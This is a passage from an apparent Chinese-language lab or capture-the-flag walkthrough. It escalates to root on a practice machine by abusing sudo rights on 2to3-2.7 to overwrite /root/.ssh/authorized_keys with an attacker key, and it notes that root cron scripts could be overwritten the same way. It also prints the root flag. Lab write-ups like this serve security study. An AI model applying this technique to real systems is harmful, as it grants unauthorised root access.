File "/usr/lib/python2.7/lib2to3/refactor.py", line 524, in processed_file
self.write_file(new_text, filename, old_text, encoding)
File "/usr/lib/python2.7/lib2to3/main.py", line 101, in write_file
write(new_text, filename, old_text, encoding)
File "/usr/lib/python2.7/lib2to3/refactor.py", line 536, in write_file
f = _open_with_encoding(filename, "w", encoding=encoding)
File "/usr/lib/python2.7/codecs.py", line 898, in open
file = __builtin__.open(filename, mode, buffering)
IOError: [Errno 21] Is a directory: '/root/.ssh/authorized_keys'啊啊啊啊,应该仔细看的,重置靶机。。。
lover@light:/tmp$ nano authorized_keys
lover@light:/tmp$ sudo /usr/bin/2to3-2.7 -w -n authorized_keys -o /root/.ssh/
lib2to3.main: Output in '/root/.ssh/' will mirror the input directory '' layout.
RefactoringTool: Skipping optional fixer: buffer
RefactoringTool: Skipping optional fixer: idioms
RefactoringTool: Skipping optional fixer: set_literal
RefactoringTool: Skipping optional fixer: ws_comma
RefactoringTool: Refactored authorized_keys
--- authorized_keys (original)
+++ authorized_keys (refactored)
@@ -1,4 +1,4 @@
text = '''
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCX4CxFTzX3/H4eZNPPElW0lQUQaQkaM+CPykvpX1WA6DKHCxaFCkN22uR/+o0COklnUr0DcJjfOwJa+FdG4XD2sbZ7HLlf5/5QCapABB5ImRKm3S8nnkB5N08DFiflK4ua9KRnRFb1+M9rgbXLyGu0RErtCla6cY2hpe9ue+Iwj4FrT1gtnLfhVTTWYK6X+q4p/UIRTukE1465+d7MacxEPpmvh9S12b/mmL50LmrRLNSGC94KoqpMFmh4S04AxjdicMUJvnw6GSeORztY1MErdlUm4ZbAleFFQlZqVod+dTNe7jXpHZTw9S42koS2Ydso+XcXI48/T/7N796aw8PVrveOzB8Yj92iJa/N1dmvnWBPuZnrqTDNAsUbcRhU48fF+v0HvOseXGVuYxpu1C+kCOcy6P9xPDL7MnJ8TM0yPEW8M1rFt6bMZuPkVadYJHWhRBz1ThZBonjG7OOcE//P426gFbjRe66qFw2eKJeg2Qihtx89UgZNDRWOtDC20VM= kali@kali
'''
-print text
+print(text)
RefactoringTool: Writing converted authorized_keys to /root/.ssh/authorized_keys.
RefactoringTool: Files that were modified:
RefactoringTool: authorized_keys
同理可以覆写高权限定时任务(运行 pspy64 可以看到有一个 root 运行的 python 定时任务),覆写第三方库的 main 函数等等都行。
root@light:~# ls -la
total 40
drwx------ 5 root root 4096 Jun 27 03:01 .
drwxr-xr-x 18 root root 4096 Nov 13 2020 ..
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rwxr-xr-x 1 root root 1921 Nov 13 2020 flag.sh
drwxr-xr-x 3 root root 4096 Nov 13 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 12 Nov 13 2020 root.txt
drwxr-xr-x 2 root root 4096 Nov 13 2020 script
-rw-r--r-- 1 root root 66 Nov 13 2020 .selected_editor
drwxr-xr-x 2 root root 4096 Jun 27 03:01 .ssh
root@light:~# cat flag.sh
#!/bin/bash
echo '\033[0;35m
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, \033[0m'
echo "-------------------------"
echo "\nPWNED HOST: $(hostname)"
echo "\nPWNED DATE: $(date)"
echo "\nWHOAMI: $(id)"
echo "\nFLAG: $(cat root.txt 2>/dev/null || cat user.txt 2>/dev/null || echo "Keep trying.")"
echo "\n------------------------"
root@light:~# cat root.txt
ilovepython
root@light:~# cd script/
root@light:~/script# ls -la
total 12
drwxr-xr-x 2 root root 4096 Nov 13 2020 .
drwx------ 5 root root 4096 Jun 27 03:01 ..
-rw-r--r-- 1 root root 21 Nov 13 2020 light.py
root@light:~/script# cat light.py
print "NOT FINISHED"
